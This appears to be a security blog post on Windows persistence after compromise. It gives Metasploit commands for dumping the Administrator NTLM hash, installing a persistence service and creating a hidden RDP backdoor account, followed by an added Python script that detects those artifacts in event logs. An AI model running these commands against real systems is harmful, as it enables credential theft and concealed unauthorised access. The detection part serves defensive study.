root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


You can run the “hashdump” command to get the Administrator NTLM hash, which you can use to authenticate later on.

You can also check the MITRE ATT&CK website.

Persistence via Services

use exploit/windows/local/persistence_service
set LPORT
set LHOST
set SESSION
exploit

Take note of the path the payload was written to, so you can delete it afterwards.

Persistence via RDP

A new account will be created, RDP will be enabled, and the username will be hidden from the login screen.

To create a new account from the Meterpreter shell:

run getgui -e -u blackanon -p hacker_123321

The “getgui” command checks whether RDP is enabled and enables it if it is disabled. Furthermore, it creates a new user and hides that user from the login screen.
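
For the defender's side of the two techniques above (the service installed under "Persistence via Services", and the account that getgui creates and hides while enabling RDP), here is an added detection example that is not part of the original post. It assumes events already parsed into dicts with hypothetical field names (service, image, target_user, key, value), taken from System event 7045 (service installed), Security event 4720 (account created) and Sysmon event 13 (registry value set); the sample events are constructed.

```python
import re

# Service binaries under user-writable directories are unusual (heuristic, an assumption).
USER_WRITABLE = re.compile(r"\\(temp|appdata|users\\public|programdata)\\", re.I)
# Winlogon key whose per-user value 0 hides that account from the logon screen.
USERLIST = r"\winlogon\specialaccounts\userlist" + "\\"
# Terminal Server value; 0 means RDP connections are allowed.
RDP_DENY = r"\control\terminal server\fdenytsconnections"

# Constructed sample events; field names are hypothetical, not a real log schema.
EVENTS = [
    {"id": 7045, "service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe"},
    {"id": 7045, "service": "kqZsvc",
     "image": r"C:\Users\alice\AppData\Local\Temp\kqZ\svc.exe"},
    {"id": 4720, "target_user": "svc_backup"},
    {"id": 13, "value": 0,
     "key": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"},
    {"id": 13, "value": 0,
     "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
            r"\SpecialAccounts\UserList\svc_backup"},
]

def triage(events):
    """Return (finding, detail) tuples for the persistence artifacts, in event order."""
    findings, created = [], set()
    for ev in events:
        if ev["id"] == 7045 and USER_WRITABLE.search(ev["image"]):
            findings.append(("service-in-user-writable-path", ev["service"]))
        elif ev["id"] == 4720:
            created.add(ev["target_user"].lower())
        elif ev["id"] == 13 and ev["value"] == 0:
            key = ev["key"].lower()
            if key.endswith(RDP_DENY):
                findings.append(("rdp-enabled", "fDenyTSConnections=0"))
            elif USERLIST in key:
                user = key.rsplit("\\", 1)[1]
                # Hidden right after creation is a stronger signal than either alone.
                tag = "new-account-hidden" if user in created else "account-hidden"
                findings.append((tag, user))
    return findings

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The three findings together (new service from a user-writable path, RDP switched on, a freshly created account hidden from the logon screen) are worth alerting on as one incident rather than as separate low-severity events.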